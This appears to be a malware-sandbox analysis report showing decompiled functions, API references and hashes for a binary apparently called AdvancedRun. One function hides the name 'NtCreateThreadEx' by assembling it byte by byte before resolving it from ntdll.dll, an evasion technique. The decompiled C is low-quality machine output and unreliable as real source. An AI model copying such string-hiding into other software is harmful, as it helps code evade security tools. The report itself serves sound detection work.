                                                                                                                    0x00401097
                                                                                                                    0x0040109b
                                                                                                                    0x004010a3
                                                                                                                    0x004010a5
                                                                                                                    0x00401270
                                                                                                                    0x00401278
                                                                                                                    0x004012b3
                                                                                                                    0x0040127a
                                                                                                                    0x00401293
                                                                                                                    0x004012a2
                                                                                                                    0x004012a2
                                                                                                                    0x004012c1
                                                                                                                    0x004012d9
                                                                                                                    0x004012ea
                                                                                                                    0x004012ec
                                                                                                                    0x004012f6
                                                                                                                    0x00000000
                                                                                                                    0x004010ab
                                                                                                                    0x004010ab
                                                                                                                    0x004010ac
                                                                                                                    0x00401231
                                                                                                                    0x00401236
                                                                                                                    0x00401239
                                                                                                                    0x0040123d
                                                                                                                    0x00401249
                                                                                                                    0x00401249
                                                                                                                    0x0040124c
                                                                                                                    0x00000000
                                                                                                                    0x00401252
                                                                                                                    0x00401259
                                                                                                                    0x00401265
                                                                                                                    0x00000000
                                                                                                                    0x00401265
                                                                                                                    0x0040123f
                                                                                                                    0x0040123f
                                                                                                                    0x00401243
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00401243
                                                                                                                    0x004010b2
                                                                                                                    0x004010b2
                                                                                                                    0x004010b5
                                                                                                                    0x004011e1
                                                                                                                    0x004011e3
                                                                                                                    0x004011e6
                                                                                                                    0x0040120e
                                                                                                                    0x00401216
                                                                                                                    0x00000000
                                                                                                                    0x0040121c
                                                                                                                    0x00401224
                                                                                                                    0x00401226
                                                                                                                    0x00401229
                                                                                                                    0x00000000
                                                                                                                    0x0040122f
                                                                                                                    0x00000000
                                                                                                                    0x0040122f
                                                                                                                    0x00401229
                                                                                                                    0x004011e8
                                                                                                                    0x004011e8
                                                                                                                    0x004011ed
                                                                                                                    0x004011fb
                                                                                                                    0x00401203
                                                                                                                    0x00401203
                                                                                                                    0x004010bb
                                                                                                                    0x004010bb
                                                                                                                    0x004010c0
                                                                                                                    0x00401151
                                                                                                                    0x0040115a
                                                                                                                    0x00401168
                                                                                                                    0x0040116b
                                                                                                                    0x0040116e
                                                                                                                    0x00401170
                                                                                                                    0x00401173
                                                                                                                    0x00401180
                                                                                                                    0x00401182
                                                                                                                    0x00401185
                                                                                                                    0x004011a4
                                                                                                                    0x004011ac
                                                                                                                    0x00000000
                                                                                                                    0x004011b2
                                                                                                                    0x004011ba
                                                                                                                    0x004011bc
                                                                                                                    0x004011c7
                                                                                                                    0x004011c9
                                                                                                                    0x004011cb
                                                                                                                    0x00000000
                                                                                                                    0x004011d1
                                                                                                                    0x00000000
                                                                                                                    0x004011d1
                                                                                                                    0x004011cb
                                                                                                                    0x00401187
                                                                                                                    0x00401187
                                                                                                                    0x00401199
                                                                                                                    0x00000000
                                                                                                                    0x00401199
                                                                                                                    0x004010c6
                                                                                                                    0x004010c8
                                                                                                                    0x004012fd
                                                                                                                    0x004012fd
                                                                                                                    0x004012fd
                                                                                                                    0x004010ce
                                                                                                                    0x004010ce
                                                                                                                    0x004010d7
                                                                                                                    0x004010e5
                                                                                                                    0x004010e8
                                                                                                                    0x004010eb
                                                                                                                    0x004010ed
                                                                                                                    0x004010f0
                                                                                                                    0x00401102
                                                                                                                    0x0040111d
                                                                                                                    0x00401125
                                                                                                                    0x00000000
                                                                                                                    0x0040112b
                                                                                                                    0x00401133
                                                                                                                    0x00401135
                                                                                                                    0x00401140
                                                                                                                    0x00401142
                                                                                                                    0x00401144
                                                                                                                    0x00000000
                                                                                                                    0x0040114a
                                                                                                                    0x0040114a
                                                                                                                    0x00000000
                                                                                                                    0x0040114a
                                                                                                                    0x00401144
                                                                                                                    0x00401104
                                                                                                                    0x0040110a
                                                                                                                    0x0040110b
                                                                                                                    0x0040110b
                                                                                                                    0x0040110e
                                                                                                                    0x00401115
                                                                                                                    0x00401117
                                                                                                                    0x00401117
                                                                                                                    0x00401102
                                                                                                                    0x004010c8
                                                                                                                    0x004010c0
                                                                                                                    0x004010b5
                                                                                                                    0x004010ac
                                                                                                                    0x00401303

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                    • String ID: AdvancedRun
                                                                                                                    • API String ID: 829165378-481304740
                                                                                                                    • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                    • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                    • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                    • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                    0x00408ae3
                                                                                                                    0x00408aeb
                                                                                                                    0x00408af3
                                                                                                                    0x00408b76
                                                                                                                    0x00408b8a
                                                                                                                    0x00408b91
                                                                                                                    0x00408b98
                                                                                                                    0x00408bb1
                                                                                                                    0x00408bb3
                                                                                                                    0x00408bc6
                                                                                                                    0x00408bcc
                                                                                                                    0x00408bda
                                                                                                                    0x00408be0
                                                                                                                    0x00408bf3
                                                                                                                    0x00408bfa
                                                                                                                    0x00408c0b
                                                                                                                    0x00408c12
                                                                                                                    0x00408c17
                                                                                                                    0x00408c1a
                                                                                                                    0x00408c2c
                                                                                                                    0x00408c39
                                                                                                                    0x00408c3d
                                                                                                                    0x00408c3f
                                                                                                                    0x00408c41
                                                                                                                    0x00408c52
                                                                                                                    0x00408c58
                                                                                                                    0x00408c58
                                                                                                                    0x00408c6f
                                                                                                                    0x00408c71
                                                                                                                    0x00408c73
                                                                                                                    0x00408c83
                                                                                                                    0x00408c89
                                                                                                                    0x00408c89
                                                                                                                    0x00408c8a
                                                                                                                    0x00408c8f
                                                                                                                    0x00408c91
                                                                                                                    0x00408c9a
                                                                                                                    0x00408c93
                                                                                                                    0x00408c93
                                                                                                                    0x00408c93
                                                                                                                    0x00408c9f
                                                                                                                    0x00408ca5
                                                                                                                    0x00408caf
                                                                                                                    0x00408cbc
                                                                                                                    0x00408cc2
                                                                                                                    0x00408cc7
                                                                                                                    0x00408ccd
                                                                                                                    0x00408cd0
                                                                                                                    0x00408cd6
                                                                                                                    0x00408cd7
                                                                                                                    0x00408cd8
                                                                                                                    0x00408cde
                                                                                                                    0x00408ce3
                                                                                                                    0x00408ceb
                                                                                                                    0x00408cfe
                                                                                                                    0x00408d03
                                                                                                                    0x00408d06
                                                                                                                    0x00408d0c
                                                                                                                    0x00408d21
                                                                                                                    0x00408d27
                                                                                                                    0x00408d0c
                                                                                                                    0x00000000
                                                                                                                    0x00408ca7
                                                                                                                    0x00408ca7
                                                                                                                    0x00408cad
                                                                                                                    0x00408d28
                                                                                                                    0x00408d2e
                                                                                                                    0x00408d35
                                                                                                                    0x00408d36
                                                                                                                    0x00408d42
                                                                                                                    0x00408d48
                                                                                                                    0x00408d4e
                                                                                                                    0x00408d54
                                                                                                                    0x00408d5a
                                                                                                                    0x00408d60
                                                                                                                    0x00408d66
                                                                                                                    0x00408d6c
                                                                                                                    0x00408d72
                                                                                                                    0x00408d73
                                                                                                                    0x00408d7f
                                                                                                                    0x00408d85
                                                                                                                    0x00408d8a
                                                                                                                    0x00408d8f
                                                                                                                    0x00408d90
                                                                                                                    0x00408da8
                                                                                                                    0x00408db9
                                                                                                                    0x00408dbf
                                                                                                                    0x00408dc5
                                                                                                                    0x00408dc5
                                                                                                                    0x00000000
                                                                                                                    0x00408cad
                                                                                                                    0x00408ca5
                                                                                                                    0x00408af6
                                                                                                                    0x00408afc
                                                                                                                    0x00408b07
                                                                                                                    0x00408b2a
                                                                                                                    0x00408b38
                                                                                                                    0x00408b53
                                                                                                                    0x00408b56
                                                                                                                    0x00408b62
                                                                                                                    0x00408b6a
                                                                                                                    0x00408b6a
                                                                                                                    0x00408b2a
                                                                                                                    0x00408b07
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                    • {Unknown}, xrefs: 00408BA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                    • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                    • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                    • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                    • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                    0x0040b04d
                                                                                                                    0x0040b05e
                                                                                                                    0x0040b060
                                                                                                                    0x0040b063
                                                                                                                    0x0040b06a
                                                                                                                    0x0040b06d
                                                                                                                    0x0040b076
                                                                                                                    0x0040b07b
                                                                                                                    0x0040b07e
                                                                                                                    0x0040b084
                                                                                                                    0x0040b08e
                                                                                                                    0x0040b0a8
                                                                                                                    0x0040b0aa
                                                                                                                    0x0040b0ad
                                                                                                                    0x0040b0b0
                                                                                                                    0x0040b0b3
                                                                                                                    0x0040b0b6
                                                                                                                    0x0040b0b8
                                                                                                                    0x0040b0bb
                                                                                                                    0x0040b0be
                                                                                                                    0x0040b0c1
                                                                                                                    0x0040b0c4
                                                                                                                    0x0040b0c7
                                                                                                                    0x0040b0ca
                                                                                                                    0x0040b0cd
                                                                                                                    0x0040b0cd
                                                                                                                    0x0040b0e5
                                                                                                                    0x0040b11f
                                                                                                                    0x0040b128
                                                                                                                    0x0040b0e7
                                                                                                                    0x0040b0e7
                                                                                                                    0x0040b0f1
                                                                                                                    0x0040b0f2
                                                                                                                    0x0040b0f3
                                                                                                                    0x0040b0fb
                                                                                                                    0x0040b0fd
                                                                                                                    0x0040b0fe
                                                                                                                    0x0040b11d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040b11d
                                                                                                                    0x0040b13c
                                                                                                                    0x0040b151
                                                                                                                    0x0040b166
                                                                                                                    0x0040b17b
                                                                                                                    0x0040b190
                                                                                                                    0x0040b1a5
                                                                                                                    0x0040b1ba
                                                                                                                    0x0040b1cf
                                                                                                                    0x0040b1d6
                                                                                                                    0x0040b1d7
                                                                                                                    0x0040b1d8
                                                                                                                    0x0040b1de
                                                                                                                    0x0040b1e3

                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                    • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                    • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                    • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                    • wcscpy.MSVCRT ref: 0040B128
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                    • API String ID: 1223191525-1542517562
                                                                                                                    • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                    • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                    • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                    • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                    0x0040a1f8
                                                                                                                    0x0040a26d
                                                                                                                    0x00000000
                                                                                                                    0x0040a26f
                                                                                                                    0x0040a205
                                                                                                                    0x0040a20b
                                                                                                                    0x0040a20d
                                                                                                                    0x0040a213
                                                                                                                    0x0040a214
                                                                                                                    0x0040a215
                                                                                                                    0x0040a216
                                                                                                                    0x0040a217
                                                                                                                    0x0040a219
                                                                                                                    0x0040a21f
                                                                                                                    0x0040a223
                                                                                                                    0x0040a227
                                                                                                                    0x0040a22b
                                                                                                                    0x0040a22f
                                                                                                                    0x0040a233
                                                                                                                    0x0040a237
                                                                                                                    0x0040a23b
                                                                                                                    0x0040a23f
                                                                                                                    0x0040a243
                                                                                                                    0x0040a247
                                                                                                                    0x0040a24b
                                                                                                                    0x0040a24f
                                                                                                                    0x0040a253
                                                                                                                    0x0040a257
                                                                                                                    0x0040a25b
                                                                                                                    0x0040a25f
                                                                                                                    0x0040a269
                                                                                                                    0x00000000
                                                                                                                    0x0040a26c
                                                                                                                    0x0040a271

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                    • API String ID: 2574300362-1257427173
                                                                                                                    • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                    • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                    • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                    • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                    0x00407f9b
                                                                                                                    0x00407fa3
                                                                                                                    0x00407fad
                                                                                                                    0x00407fb9
                                                                                                                    0x0040802e
                                                                                                                    0x00408032
                                                                                                                    0x00408038
                                                                                                                    0x0040803e
                                                                                                                    0x00407fbb
                                                                                                                    0x00407fc9
                                                                                                                    0x00407fd0
                                                                                                                    0x00407fe0
                                                                                                                    0x00407fe5
                                                                                                                    0x00407ff7
                                                                                                                    0x00408015
                                                                                                                    0x0040801b
                                                                                                                    0x00408021
                                                                                                                    0x00408021
                                                                                                                    0x00408051
                                                                                                                    0x00408051
                                                                                                                    0x00408059
                                                                                                                    0x00408065
                                                                                                                    0x00408069
                                                                                                                    0x0040806f
                                                                                                                    0x00408087
                                                                                                                    0x00408087
                                                                                                                    0x0040809c
                                                                                                                    0x004080bb
                                                                                                                    0x004080d1
                                                                                                                    0x004080de
                                                                                                                    0x004080e2
                                                                                                                    0x004080ea
                                                                                                                    0x004080fb
                                                                                                                    0x00408105
                                                                                                                    0x00408115
                                                                                                                    0x00408121
                                                                                                                    0x00408127
                                                                                                                    0x00408150

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00407FD0
                                                                                                                    • memset.MSVCRT ref: 00407FE5
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
